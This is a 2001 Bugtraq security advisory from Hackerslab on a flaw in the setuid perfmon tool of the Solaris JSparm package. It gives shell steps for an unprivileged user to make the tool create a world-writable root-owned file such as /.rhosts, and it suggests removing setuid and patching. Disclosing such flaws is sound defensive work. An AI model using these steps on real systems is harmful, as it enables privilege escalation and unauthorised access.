[19806] in bugtraq
[ Hackerslab bug_paper ] SunOS application perfmon vulnerability
daemon@ATHENA.MIT.EDU (±è¿ëÁØ KimYongJun)
Fri Mar 23 09:11:36 2001
Message-ID: <200103230811.RAA01496@ce.hannam.ac.kr>
Date: Fri, 23 Mar 2001 17:11:52 +0900
Reply-To: ±è¿ëÁØ KimYongJun <s96192@CE.HANNAM.AC.KR>
From: ±è¿ëÁØ KimYongJun <s96192@CE.HANNAM.AC.KR>
To: BUGTRAQ@SECURITYFOCUS.COM
==============================================================================
[ Hackerslab bug_paper ] SunOS application perfmon vulnerability
==============================================================================
File : /opt/JSParm/bin/perfmon
SYSTEM : Solaris 2.X
INFO :
parm is a program that displays system information .
parm is SunOS application. It's not included in Solaris basic package.
There is a vulneribility in perfmon program that you can create
any file with root privilege as follow:
$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &
Choose Logging -> Logging File
In Selection part, input the file path you want to create
ex:) /.rhosts
following file is created in a second.
-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost
SOLUTION :
remove setuid permition, contact your vendor and get a patch.
==-------------------------------------------------------------------------------==
********
* ** ** *
* ** ** *
* ****** *
* ** ** * loveyou@hackerslab.org
* ** ** * [ http://www.hackerslab.org ]
******** HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==
